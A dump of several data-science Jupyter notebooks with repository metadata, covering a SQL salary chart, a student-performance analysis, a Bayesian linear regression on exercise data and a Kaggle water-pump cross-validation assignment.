"connection = create_engine(connection_string).connect()\n\nquery = \"select round(avg(s.salary)), t.title \\\nfrom employee e, salary s, title t \\\nwhere s.emp_no = e.emp_no and \\\ne.emp_title_id = t.title_id \\\ngroup by t.title\"\n\nqueryResults2 = doQuery(query)\nqueryResults2_df = pd.DataFrame(queryResults2)\n\nconnection.close()\nqueryResults2_df = queryResults2_df.rename(columns={0:'Average Salary', 1:'Title'})\nqueryResults2_df",
"_____no_output_____"
],
[
"# Create a bar chart based upon the above data\n\naverage_salary=queryResults2_df['Average Salary']\nx_axis = np.arange(len(average_salary))\nplt.bar(x_axis, average_salary, color=\"b\", align=\"center\")\n# Create the ticks for our bar chart's x axis\ntick_locations = [value for value in x_axis]\nplt.xticks(tick_locations, queryResults2_df['Title'], rotation=45)\n# Create the ticks for our bar chart's x axis\ntick_locations = [value for value in x_axis]\nplt.xticks(tick_locations, queryResults2_df['Title'], rotation=45)\n# Set the limits of the x axis\nplt.xlim(-0.75, len(x_axis)-0.25)\nplt.ylim(0, max(average_salary)+10000)\n# Give the chart a title, x label, and y label\nplt.title(\"Average Salary by Title\")\nplt.xlabel(\"Titles\")\nplt.ylabel(\"Average Salary\")\nplt.savefig(\"./Data Analysis/Images/AverageSalaryByTitle.png\")\nplt.show()",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
cb2c7372d96d73cfce3274df59bfc8025861ec88 | 419,408 | ipynb | Jupyter Notebook | Avaliar_o_desempenho_de_um_aluno_usando_técnicas_de_Machine_Learning_e_python.ipynb | MarceloClaro/python-business | 7027e358cbb762cb86ed7fa6e1590d6d6155e1ad | [
"CC-BY-4.0"
] | null | null | null | Avaliar_o_desempenho_de_um_aluno_usando_técnicas_de_Machine_Learning_e_python.ipynb | MarceloClaro/python-business | 7027e358cbb762cb86ed7fa6e1590d6d6155e1ad | [
"CC-BY-4.0"
] | null | null | null | Avaliar_o_desempenho_de_um_aluno_usando_técnicas_de_Machine_Learning_e_python.ipynb | MarceloClaro/python-business | 7027e358cbb762cb86ed7fa6e1590d6d6155e1ad | [
"CC-BY-4.0"
] | null | null | null | 310.902891 | 67,474 | 0.896464 | [
[
[
"<a href=\"https://colab.research.google.com/github/MarceloClaro/python-business/blob/gh-pages/Avaliar_o_desempenho_de_um_aluno_usando_t%C3%A9cnicas_de_Machine_Learning_e_python.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>",
"_____no_output_____"
],
[
"# **AVALIAÇÃO DO DESEMPENHO DE ALUNOS**\r\n\r\n# Instalções de Bibliotecas em Python.",
"_____no_output_____"
]
],
[
[
"# Bibliotecas para algumas operações básicas\r\nimport numpy as np\r\nimport pandas as pd",
"_____no_output_____"
]
],
[
[
"### Biblioteca dabl tem que ser instalado no Colab",
"_____no_output_____"
]
],
[
[
"pip install git+https://github.com/amueller/dabl/",
"Collecting git+https://github.com/amueller/dabl/\n Cloning https://github.com/amueller/dabl/ to /tmp/pip-req-build-m74cqrt1\n Running command git clone -q https://github.com/amueller/dabl/ /tmp/pip-req-build-m74cqrt1\nRequirement already satisfied (use --upgrade to upgrade): dabl==0.1.8 from git+https://github.com/amueller/dabl/ in /usr/local/lib/python3.6/dist-packages\nRequirement already satisfied: numpy in /usr/local/lib/python3.6/dist-packages (from dabl==0.1.8) (1.19.4)\nRequirement already satisfied: scipy in /usr/local/lib/python3.6/dist-packages (from dabl==0.1.8) (1.4.1)\nRequirement already satisfied: scikit-learn in /usr/local/lib/python3.6/dist-packages (from dabl==0.1.8) (0.22.2.post1)\nRequirement already satisfied: pandas in /usr/local/lib/python3.6/dist-packages (from dabl==0.1.8) (1.1.5)\nRequirement already satisfied: matplotlib in /usr/local/lib/python3.6/dist-packages (from dabl==0.1.8) (3.2.2)\nRequirement already satisfied: seaborn in /usr/local/lib/python3.6/dist-packages (from dabl==0.1.8) (0.11.0)\nRequirement already satisfied: joblib>=0.11 in /usr/local/lib/python3.6/dist-packages (from scikit-learn->dabl==0.1.8) (1.0.0)\nRequirement already satisfied: python-dateutil>=2.7.3 in /usr/local/lib/python3.6/dist-packages (from pandas->dabl==0.1.8) (2.8.1)\nRequirement already satisfied: pytz>=2017.2 in /usr/local/lib/python3.6/dist-packages (from pandas->dabl==0.1.8) (2018.9)\nRequirement already satisfied: cycler>=0.10 in /usr/local/lib/python3.6/dist-packages (from matplotlib->dabl==0.1.8) (0.10.0)\nRequirement already satisfied: pyparsing!=2.0.4,!=2.1.2,!=2.1.6,>=2.0.1 in /usr/local/lib/python3.6/dist-packages (from matplotlib->dabl==0.1.8) (2.4.7)\nRequirement already satisfied: kiwisolver>=1.0.1 in /usr/local/lib/python3.6/dist-packages (from matplotlib->dabl==0.1.8) (1.3.1)\nRequirement already satisfied: six>=1.5 in /usr/local/lib/python3.6/dist-packages (from python-dateutil>=2.7.3->pandas->dabl==0.1.8) (1.15.0)\nBuilding wheels for collected packages: dabl\n Building wheel for dabl (setup.py) ... \u001b[?25l\u001b[?25hdone\n Created wheel for dabl: filename=dabl-0.1.8-cp36-none-any.whl size=569084 sha256=6ed9d5c162cc47cfb92791e774ef64d37d56b61e9e90bbb47d1650d8490a6780\n Stored in directory: /tmp/pip-ephem-wheel-cache-b_55f0a5/wheels/a8/9f/dd/0db433c80ea11cc41e7fea0fd2e9b1b240068e64d6dce0c706\nSuccessfully built dabl\n"
],
[
"# Biblioteca para visualizações\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nimport plotly.express as px\r\nimport dabl",
"_____no_output_____"
]
],
[
[
"###Para ler o conjunto de dados:",
"_____no_output_____"
]
],
[
[
"data = pd.read_csv(\"/content/Students.csv\",encoding='ISO-8859-1')",
"_____no_output_____"
],
[
"# obtendo a forma dos dados\r\nprint(data.shape)\r\n# (quantidades de linhas ou dados, quantidades de colinas ou categorias)",
"(1000, 8)\n"
]
],
[
[
"###Para olhar para os primeiros 30 registros no conjunto de dados",
"_____no_output_____"
]
],
[
[
"data.head(30)",
"_____no_output_____"
]
],
[
[
"###Estatísticas Descritivas",
"_____no_output_____"
]
],
[
[
"data.describe()\r\n#count = Contagem total de linhas\r\n#mean = Valor Médio\r\n#std = Desvio Padrão\r\n#min = Valor Mínimo\r\n#25% = valor dos 25%\r\n#50% = valor dos 50%\r\n#75% = valor dos 75%\r\n#max = Valor Máximo\r\n",
"_____no_output_____"
]
],
[
[
"###Vamos verificar o não de itens únicos presentes na coluna categórica.",
"_____no_output_____"
]
],
[
[
"data.select_dtypes('object').nunique()",
"_____no_output_____"
]
],
[
[
"###Vamos verificar a porcentagem de dados perdidos em cada coluna presente nos dados:",
"_____no_output_____"
]
],
[
[
"no_of_columns = data.shape[0]\r\npercentage_of_missing_data = data.isnull().sum()/no_of_columns\r\nprint(percentage_of_missing_data)",
"gender 0.0\nrace/ethnicity 0.0\nparental level of education 0.0\nlunch 0.0\ntest preparation course 0.0\nmath score 0.0\nreading score 0.0\nwriting score 0.0\ndtype: float64\n"
]
],
[
[
"###Para ver a comparação de todos os outros atributos em relação às marcas matemáticas.",
"_____no_output_____"
]
],
[
[
"plt.rcParams['figure.figsize'] = (18, 6)\r\nplt.style.use('fivethirtyeight')\r\ndabl.plot(data, target_col = 'math score')",
"Target looks like regression\n"
]
],
[
[
"###Comparação de todos os outros atributos em relação às marcas de leitura :\r\n",
"_____no_output_____"
]
],
[
[
"plt.rcParams['figure.figsize'] = (18, 6)\r\nplt.style.use('fivethirtyeight')\r\ndabl.plot(data, target_col = 'reading score')",
"Target looks like regression\n"
]
],
[
[
"###Vamos verificar o efeito do almoço na performance do aluno:",
"_____no_output_____"
]
],
[
[
"data[['lunch','gender','math score','writing score',\r\n 'reading score']].groupby(['lunch','gender']).agg('median')",
"_____no_output_____"
]
],
[
[
"###Vamos verificar o efeito do curso de preparação de testes em pontuações:\r\n\r\n",
"_____no_output_____"
]
],
[
[
"data[['test preparation course',\r\n 'gender',\r\n 'math score',\r\n 'writing score',\r\n 'reading score']].groupby(['test preparation course','gender']).agg('median')",
"_____no_output_____"
]
],
[
[
"# Visualizações de dados\r\n### Visualizando o número de homens e mulheres no conjunto de dados",
"_____no_output_____"
]
],
[
[
"plt.rcParams['figure.figsize'] = (15, 5)\r\nsns.countplot(data['gender'], palette = 'bone')\r\nplt.title('Comparison of Males and Females', fontweight = 30)\r\nplt.xlabel('Gender')\r\nplt.ylabel('Count')\r\nplt.show()",
"/usr/local/lib/python3.6/dist-packages/seaborn/_decorators.py:43: FutureWarning:\n\nPass the following variable as a keyword arg: x. From version 0.12, the only valid positional argument will be `data`, and passing other arguments without an explicit keyword will result in an error or misinterpretation.\n\n"
]
],
[
[
"### Visualizando os diferentes grupos no conjunto de dados:",
"_____no_output_____"
]
],
[
[
"plt.rcParams['figure.figsize'] = (15, 9)\r\nplt.style.use('ggplot')\r\nsns.countplot(data['race/ethnicity'], palette = 'pink')\r\nplt.title('Comparison of various groups', fontweight = 30, fontsize = 20)\r\nplt.xlabel('Groups')\r\nplt.ylabel('count')\r\nplt.show()",
"/usr/local/lib/python3.6/dist-packages/seaborn/_decorators.py:43: FutureWarning:\n\nPass the following variable as a keyword arg: x. From version 0.12, the only valid positional argument will be `data`, and passing other arguments without an explicit keyword will result in an error or misinterpretation.\n\n"
]
],
[
[
"###Visualizando os diferentes níveis de educação parental:",
"_____no_output_____"
]
],
[
[
"plt.rcParams['figure.figsize'] = (15, 9)\r\nplt.style.use('fivethirtyeight')\r\nsns.countplot(data['parental level of education'], palette = 'Blues')\r\nplt.title('Comparison of Parental Education', fontweight = 30, fontsize = 20)\r\nplt.xlabel('Degree')\r\nplt.ylabel('count')\r\nplt.show()",
"/usr/local/lib/python3.6/dist-packages/seaborn/_decorators.py:43: FutureWarning:\n\nPass the following variable as a keyword arg: x. From version 0.12, the only valid positional argument will be `data`, and passing other arguments without an explicit keyword will result in an error or misinterpretation.\n\n"
],
[
"",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
cb2c74a6226e0fb30506b46f723b3ba586bc6404 | 92,956 | ipynb | Jupyter Notebook | bayesian_lr/.ipynb_checkpoints/Bayesian Linear Regression Demonstration-checkpoint.ipynb | reed9999/koehrsen-for-timeseries | bb2d57a1b2de55f03cb7e09ef71f8b88a859c559 | [
"MIT"
] | 5 | 2019-06-25T21:01:17.000Z | 2021-07-23T13:47:29.000Z | bayesian_lr/.ipynb_checkpoints/Bayesian Linear Regression Demonstration-checkpoint.ipynb | reed9999/koehrsen-for-timeseries | bb2d57a1b2de55f03cb7e09ef71f8b88a859c559 | [
"MIT"
] | null | null | null | bayesian_lr/.ipynb_checkpoints/Bayesian Linear Regression Demonstration-checkpoint.ipynb | reed9999/koehrsen-for-timeseries | bb2d57a1b2de55f03cb7e09ef71f8b88a859c559 | [
"MIT"
] | 3 | 2020-03-04T00:24:27.000Z | 2021-12-04T19:47:20.000Z | 139.155689 | 47,304 | 0.867604 | [
[
[
"# Basic Bayesian Linear Regression Implementation",
"_____no_output_____"
]
],
[
[
"# Pandas and numpy for data manipulation\nimport pandas as pd\nimport numpy as np\n\n# Matplotlib and seaborn for visualization\nimport matplotlib.pyplot as plt\n%matplotlib inline \n\nimport seaborn as sns\n\n# Linear Regression to verify implementation\nfrom sklearn.linear_model import LinearRegression\n\n# Scipy for statistics\nimport scipy\n\n# PyMC3 for Bayesian Inference\nimport pymc3 as pm",
"WARNING (theano.tensor.blas): Using NumPy C-API based implementation for BLAS functions.\n"
]
],
[
[
"# Load in Exercise Data",
"_____no_output_____"
]
],
[
[
"exercise = pd.read_csv('data/exercise.csv')\ncalories = pd.read_csv('data/calories.csv')\ndf = pd.merge(exercise, calories, on = 'User_ID')\ndf = df[df['Calories'] < 300]\ndf = df.reset_index()\ndf['Intercept'] = 1\ndf.head()",
"_____no_output_____"
]
],
[
[
"# Plot Relationship",
"_____no_output_____"
]
],
[
[
"plt.figure(figsize=(8, 8))\n\nplt.plot(df['Duration'], df['Calories'], 'bo');\nplt.xlabel('Duration (min)', size = 18); plt.ylabel('Calories', size = 18); \nplt.title('Calories burned vs Duration of Exercise', size = 20);",
"_____no_output_____"
],
[
"# Create the features and response\nX = df.loc[:, ['Intercept', 'Duration']]\ny = df.ix[:, 'Calories']",
"_____no_output_____"
]
],
[
[
"# Implement Ordinary Least Squares Linear Regression by Hand",
"_____no_output_____"
]
],
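[
[
"(Added note, not part of the original notebook.) The by-hand implementation below uses the closed-form normal-equation solution of ordinary least squares,\n\n$$\\hat{\\beta} = (X^{T} X)^{-1} X^{T} y,$$\n\nwhere $X$ is the feature matrix (including the intercept column) and $y$ is the response vector.",
"_____no_output_____"
]
],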
[
[
"# Takes a matrix of features (with intercept as first column) \n# and response vector and calculates linear regression coefficients\ndef linear_regression(X, y):\n # Equation for linear regression coefficients\n beta = np.matmul(np.matmul(np.linalg.inv(np.matmul(X.T, X)), X.T), y)\n return beta",
"_____no_output_____"
],
[
"# Run the by hand implementation\nby_hand_coefs = linear_regression(X, y)\nprint('Intercept calculated by hand:', by_hand_coefs[0])\nprint('Slope calculated by hand: ', by_hand_coefs[1])",
"Intercept calculated by hand: -21.82810252605084\nSlope calculated by hand: 7.169783349587853\n"
],
[
"xs = np.linspace(4, 31, 1000)\nys = by_hand_coefs[0] + by_hand_coefs[1] * xs\n\nplt.figure(figsize=(8, 8))\nplt.plot(df['Duration'], df['Calories'], 'bo', label = 'observations', alpha = 0.8);\nplt.xlabel('Duration (min)', size = 18); plt.ylabel('Calories', size = 18); \nplt.plot(xs, ys, 'r--', label = 'OLS Fit', linewidth = 3)\nplt.legend(prop={'size': 16})\nplt.title('Calories burned vs Duration of Exercise', size = 20);",
"_____no_output_____"
]
],
[
[
"## Prediction for Datapoint",
"_____no_output_____"
]
],
[
[
"print('Exercising for 15.5 minutes will burn an estimated {:.2f} calories.'.format(\n by_hand_coefs[0] + by_hand_coefs[1] * 15.5))",
"Exercising for 15.5 minutes will burn an estimated 89.30 calories.\n"
]
],
[
[
"# Verify with Scikit-learn Implementation",
"_____no_output_____"
]
],
[
[
"# Create the model and fit on the data\nlr = LinearRegression()\nlr.fit(X.Duration.reshape(-1, 1), y)\nprint('Intercept from library:', lr.intercept_)\nprint('Slope from library:', lr.coef_[0])",
"Intercept from library: -21.828102526050813\nSlope from library: 7.169783349587853\n"
]
],
[
[
"# Bayesian Linear Regression\n\n### PyMC3 for Bayesian Inference\n\nImplement MCMC to find the posterior distribution of the model parameters. Rather than a single point estimate of the model weights, Bayesian linear regression will give us a posterior distribution for the model weights.",
"_____no_output_____"
],
[
"## Model with 500 Observations",
"_____no_output_____"
]
],
[
[
"with pm.Model() as linear_model_500:\n # Intercept\n intercept = pm.Normal('Intercept', mu = 0, sd = 10)\n \n # Slope \n slope = pm.Normal('slope', mu = 0, sd = 10)\n \n # Standard deviation\n sigma = pm.HalfNormal('sigma', sd = 10)\n \n # Estimate of mean\n mean = intercept + slope * X.loc[0:499, 'Duration']\n \n # Observed values\n Y_obs = pm.Normal('Y_obs', mu = mean, sd = sigma, observed = y.values[0:500])\n \n # Sampler\n step = pm.NUTS()\n\n # Posterior distribution\n linear_trace_500 = pm.sample(1000, step)",
"_____no_output_____"
]
],
[
[
"## Model with all Observations",
"_____no_output_____"
]
],
[
[
"with pm.Model() as linear_model:\n # Intercept\n intercept = pm.Normal('Intercept', mu = 0, sd = 10)\n \n # Slope \n slope = pm.Normal('slope', mu = 0, sd = 10)\n \n # Standard deviation\n sigma = pm.HalfNormal('sigma', sd = 10)\n \n # Estimate of mean\n mean = intercept + slope * X.loc[:, 'Duration']\n \n # Observed values\n Y_obs = pm.Normal('Y_obs', mu = mean, sd = sigma, observed = y.values)\n \n # Sampler\n step = pm.NUTS()\n\n # Posterior distribution\n linear_trace = pm.sample(1000, step)",
"Multiprocess sampling (2 chains in 2 jobs)\nNUTS: [sigma_log__, slope, Intercept]\n"
]
],
[
[
"# Bayesian Model Results\n\nThe Bayesian Model provides more opportunities for interpretation than the ordinary least squares regression because it provides a posterior distribution. We can use this distribution to find the most likely single value as well as the entire range of likely values for our model parameters.\n\nPyMC3 has many built in tools for visualizing and inspecting model runs. These let us see the distributions and provide estimates with a level of uncertainty, which should be a necessary part of any model.",
"_____no_output_____"
],
[
"## Trace of All Model Parameters",
"_____no_output_____"
]
],
[
[
"pm.traceplot(linear_trace, figsize = (12, 12));",
"_____no_output_____"
]
],
[
[
"## Posterior Distribution of Model Parameters",
"_____no_output_____"
]
],
[
[
"pm.plot_posterior(linear_trace, figsize = (12, 10), text_size = 20);",
"_____no_output_____"
]
],
[
[
"## Confidence Intervals for Model Parameters",
"_____no_output_____"
]
],
[
[
"pm.forestplot(linear_trace);",
"_____no_output_____"
]
],
[
[
"# Predictions of Response Sampled from the Posterior\n\nWe can now generate predictions of the linear regression line using the model results. The following plot shows 1000 different estimates of the regression line drawn from the posterior. The distribution of the lines gives an estimate of the uncertainty in the estimate. Bayesian Linear Regression has the benefit that it gives us a posterior __distribution__ rather than a __single point estimate__ in the frequentist ordinary least squares regression.",
"_____no_output_____"
],
[
"## All Observations",
"_____no_output_____"
]
],
[
[
"plt.figure(figsize = (8, 8))\npm.plot_posterior_predictive_glm(linear_trace, samples = 100, eval=np.linspace(2, 30, 100), linewidth = 1, \n color = 'red', alpha = 0.8, label = 'Bayesian Posterior Fits',\n lm = lambda x, sample: sample['Intercept'] + sample['slope'] * x);\nplt.scatter(X['Duration'], y.values, s = 12, alpha = 0.8, c = 'blue', label = 'Observations')\nplt.plot(X['Duration'], by_hand_coefs[0] + X['Duration'] * by_hand_coefs[1], 'k--', label = 'OLS Fit', linewidth = 1.4)\nplt.title('Posterior Predictions with all Observations', size = 20); plt.xlabel('Duration (min)', size = 18);\nplt.ylabel('Calories', size = 18);\nplt.legend(prop={'size': 16});",
"_____no_output_____"
],
[
"pm.df_summary(linear_trace)",
"_____no_output_____"
]
],
[
[
"## Limited Observations",
"_____no_output_____"
]
],
[
[
"plt.figure(figsize = (8, 8))\npm.plot_posterior_predictive_glm(linear_trace_500, samples = 100, eval=np.linspace(2, 30, 100), linewidth = 1, \n color = 'red', alpha = 0.8, label = 'Bayesian Posterior Fits',\n lm = lambda x, sample: sample['Intercept'] + sample['slope'] * x);\nplt.scatter(X['Duration'][:500], y.values[:500], s = 12, alpha = 0.8, c = 'blue', label = 'Observations')\nplt.plot(X['Duration'], by_hand_coefs[0] + X['Duration'] * by_hand_coefs[1], 'k--', label = 'OLS Fit', linewidth = 1.4)\nplt.title('Posterior Predictions with Limited Observations', size = 20); plt.xlabel('Duration (min)', size = 18);\nplt.ylabel('Calories', size = 18);\nplt.legend(prop={'size': 16});",
"_____no_output_____"
],
[
"pm.df_summary(linear_trace_500)",
"_____no_output_____"
]
],
[
[
"# Specific Prediction for One Datapoint",
"_____no_output_____"
]
],
[
[
"bayes_prediction = linear_trace['Intercept'] + linear_trace['slope'] * 15.5",
"_____no_output_____"
],
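[
"# (Added sketch, not part of the original notebook.)\n# The posterior samples above can be summarized with a credible interval,\n# e.g. the central 95% of predicted calories for a 15.5 minute workout.\nlower, upper = np.percentile(bayes_prediction, [2.5, 97.5])\nprint(f'95% credible interval: {lower:.1f} to {upper:.1f} calories')",
"_____no_output_____"
],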
[
"plt.figure(figsize = (8, 8))\nplt.style.use('fivethirtyeight')\nsns.kdeplot(bayes_prediction, label = 'Bayes Posterior Prediction')\nplt.vlines(x = by_hand_coefs[0] + by_hand_coefs[1] * 15.5, \n ymin = 0, ymax = 2.5, \n label = 'OLS Prediction',\n colors = 'red', linestyles='--')\nplt.legend();\nplt.xlabel('Calories Burned', size = 18), plt.ylabel('Probability Density', size = 18);\nplt.title('Posterior Prediction for 15.5 Minutes', size = 20);",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
cb2c74cd6341e82fcdb5879fa6ae9cb45e4e55aa | 66,848 | ipynb | Jupyter Notebook | module3-cross-validation/Scott_LS_DS10_223_assignment.ipynb | hoops92/DS-Unit-2-Kaggle-Challenge | 1ebdac9f196ec1fe451189ab9b74d54e99d81dc5 | [
"MIT"
] | null | null | null | module3-cross-validation/Scott_LS_DS10_223_assignment.ipynb | hoops92/DS-Unit-2-Kaggle-Challenge | 1ebdac9f196ec1fe451189ab9b74d54e99d81dc5 | [
"MIT"
] | null | null | null | module3-cross-validation/Scott_LS_DS10_223_assignment.ipynb | hoops92/DS-Unit-2-Kaggle-Challenge | 1ebdac9f196ec1fe451189ab9b74d54e99d81dc5 | [
"MIT"
] | null | null | null | 56.26936 | 452 | 0.353608 | [
[
[
"<a href=\"https://colab.research.google.com/github/hoops92/DS-Unit-2-Kaggle-Challenge/blob/master/module3-cross-validation/Scott_LS_DS10_223_assignment.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>",
"_____no_output_____"
],
[
"Lambda School Data Science\n\n*Unit 2, Sprint 2, Module 3*\n\n---",
"_____no_output_____"
],
[
"# Cross-Validation\n\n\n## Assignment\n- [ ] [Review requirements for your portfolio project](https://lambdaschool.github.io/ds/unit2), then submit your dataset.\n- [ ] Continue to participate in our Kaggle challenge. \n- [ ] Use scikit-learn for hyperparameter optimization with RandomizedSearchCV.\n- [ ] Submit your predictions to our Kaggle competition. (Go to our Kaggle InClass competition webpage. Use the blue **Submit Predictions** button to upload your CSV file. Or you can use the Kaggle API to submit your predictions.)\n- [ ] Commit your notebook to your fork of the GitHub repo.\n\n\nYou won't be able to just copy from the lesson notebook to this assignment.\n\n- Because the lesson was ***regression***, but the assignment is ***classification.***\n- Because the lesson used [TargetEncoder](https://contrib.scikit-learn.org/categorical-encoding/targetencoder.html), which doesn't work as-is for _multi-class_ classification.\n\nSo you will have to adapt the example, which is good real-world practice.\n\n1. Use a model for classification, such as [RandomForestClassifier](https://scikit-learn.org/stable/modules/generated/sklearn.ensemble.RandomForestClassifier.html)\n2. Use hyperparameters that match the classifier, such as `randomforestclassifier__ ...`\n3. Use a metric for classification, such as [`scoring='accuracy'`](https://scikit-learn.org/stable/modules/model_evaluation.html#common-cases-predefined-values)\n4. If you’re doing a multi-class classification problem — such as whether a waterpump is functional, functional needs repair, or nonfunctional — then use a categorical encoding that works for multi-class classification, such as [OrdinalEncoder](https://contrib.scikit-learn.org/categorical-encoding/ordinal.html) (not [TargetEncoder](https://contrib.scikit-learn.org/categorical-encoding/targetencoder.html))\n\n\n\n## Stretch Goals\n\n### Reading\n- Jake VanderPlas, [Python Data Science Handbook, Chapter 5.3](https://jakevdp.github.io/PythonDataScienceHandbook/05.03-hyperparameters-and-model-validation.html), Hyperparameters and Model Validation\n- Jake VanderPlas, [Statistics for Hackers](https://speakerdeck.com/jakevdp/statistics-for-hackers?slide=107)\n- Ron Zacharski, [A Programmer's Guide to Data Mining, Chapter 5](http://guidetodatamining.com/chapter5/), 10-fold cross validation\n- Sebastian Raschka, [A Basic Pipeline and Grid Search Setup](https://github.com/rasbt/python-machine-learning-book/blob/master/code/bonus/svm_iris_pipeline_and_gridsearch.ipynb)\n- Peter Worcester, [A Comparison of Grid Search and Randomized Search Using Scikit Learn](https://blog.usejournal.com/a-comparison-of-grid-search-and-randomized-search-using-scikit-learn-29823179bc85)\n\n### Doing\n- Add your own stretch goals!\n- Try other [categorical encodings](https://contrib.scikit-learn.org/categorical-encoding/). See the previous assignment notebook for details.\n- In additon to `RandomizedSearchCV`, scikit-learn has [`GridSearchCV`](https://scikit-learn.org/stable/modules/generated/sklearn.model_selection.GridSearchCV.html). Another library called scikit-optimize has [`BayesSearchCV`](https://scikit-optimize.github.io/notebooks/sklearn-gridsearchcv-replacement.html). 
Experiment with these alternatives.\n- _[Introduction to Machine Learning with Python](http://shop.oreilly.com/product/0636920030515.do)_ discusses options for \"Grid-Searching Which Model To Use\" in Chapter 6:\n\n> You can even go further in combining GridSearchCV and Pipeline: it is also possible to search over the actual steps being performed in the pipeline (say whether to use StandardScaler or MinMaxScaler). This leads to an even bigger search space and should be considered carefully. Trying all possible solutions is usually not a viable machine learning strategy. However, here is an example comparing a RandomForestClassifier and an SVC ...\n\nThe example is shown in [the accompanying notebook](https://github.com/amueller/introduction_to_ml_with_python/blob/master/06-algorithm-chains-and-pipelines.ipynb), code cells 35-37. Could you apply this concept to your own pipelines?\n",
"_____no_output_____"
],
[
"### BONUS: Stacking!\n\nHere's some code you can use to \"stack\" multiple submissions, which is another form of ensembling:\n\n```python\nimport pandas as pd\n\n# Filenames of your submissions you want to ensemble\nfiles = ['submission-01.csv', 'submission-02.csv', 'submission-03.csv']\n\ntarget = 'status_group'\nsubmissions = (pd.read_csv(file)[[target]] for file in files)\nensemble = pd.concat(submissions, axis='columns')\nmajority_vote = ensemble.mode(axis='columns')[0]\n\nsample_submission = pd.read_csv('sample_submission.csv')\nsubmission = sample_submission.copy()\nsubmission[target] = majority_vote\nsubmission.to_csv('my-ultimate-ensemble-submission.csv', index=False)\n```",
"_____no_output_____"
]
],
[
[
"%%capture\nimport sys\n\n# If you're on Colab:\nif 'google.colab' in sys.modules:\n DATA_PATH = 'https://raw.githubusercontent.com/LambdaSchool/DS-Unit-2-Kaggle-Challenge/master/data/'\n !pip install category_encoders==2.*\n\n# If you're working locally:\nelse:\n DATA_PATH = '../data/'",
"_____no_output_____"
],
[
"import pandas as pd\n\n# Merge train_features.csv & train_labels.csv\ntrain = pd.merge(pd.read_csv(DATA_PATH+'waterpumps/train_features.csv'), \n pd.read_csv(DATA_PATH+'waterpumps/train_labels.csv'))\n\n# Read test_features.csv & sample_submission.csv\ntest = pd.read_csv(DATA_PATH+'waterpumps/test_features.csv')\nsample_submission = pd.read_csv(DATA_PATH+'waterpumps/sample_submission.csv')",
"_____no_output_____"
]
],
[
[
"## Define a function to wrangle train, validate, and test sets in the same way. Clean outliers and engineer features.",
"_____no_output_____"
]
],
[
[
"import numpy as np\n\ndef wrangle(X):\n \"\"\"Wrangle train, validate, and test sets in the same way\"\"\"\n \n # Prevent SettingWithCopyWarning\n X = X.copy()\n \n # About 3% of the time, latitude has small values near zero,\n # outside Tanzania, so we'll treat these values like zero.\n X['latitude'] = X['latitude'].replace(-2e-08, 0)\n \n # When columns have zeros and shouldn't, they are like null values.\n # So we will replace the zeros with nulls, and impute missing values later.\n cols_with_zeros = ['longitude', 'latitude', 'construction_year',\n 'gps_height','population','amount_tsh']\n for col in cols_with_zeros:\n X[col] = X[col].replace(0, np.nan)\n X[col+'_MISSING'] = X[col].isnull()\n \n # Approximate distance from 'Null Island'\n X['distance'] = ((X['latitude']+10.99846435)**2 + (X['longitude']-19.6071219)**2)**.5\n\n # Convert to datetime and create year_ month_ & day_recorded\n X['date_recorded'] = pd.to_datetime(X['date_recorded'], infer_datetime_format=True)\n X['year_recorded'] = X['date_recorded'].dt.year\n X['month_recorded'] = X['date_recorded'].dt.month\n X['day_recorded'] = X['date_recorded'].dt.day\n X = X.drop(columns='date_recorded')\n\n # Engineer feature: how many years from construction_year to date_recorded\n X['years'] = X['year_recorded'] - X['construction_year']\n X['years_MISSING'] = X['years'].isnull()\n\n # region_code & district_code are numeric columns, but should be categorical features,\n # so convert it from a number to a string\n X['region_code'] = X['region_code'].astype(str)\n X['district_code'] = X['district_code'].astype(str)\n \n # quantity & quantity_group are duplicates, so drop one\n X = X.drop(columns='quantity_group')\n \n # source, source_class & source_type are almost identical. \n # source has higher level of detail.\n X = X.drop(columns=['source_class','source_type'])\n\n # recorded_by has single value, so drop.\n X = X.drop(columns='recorded_by')\n\n X = X.drop(columns='id')\n\n # water_quality & quality_group are almost identical. \n # water_quality has higher level of detail.\n X = X.drop(columns='quality_group')\n\n # waterpoint_type & waterpoint_type_group are almost identical. \n # waterpoint_type has higher level of detail.\n X = X.drop(columns='waterpoint_type_group')\n\n # payment & payment_type are duplicates, so drop one\n X = X.drop(columns='payment_type')\n\n # extraction_type, extraction_type_class & extraction_type_group are almost 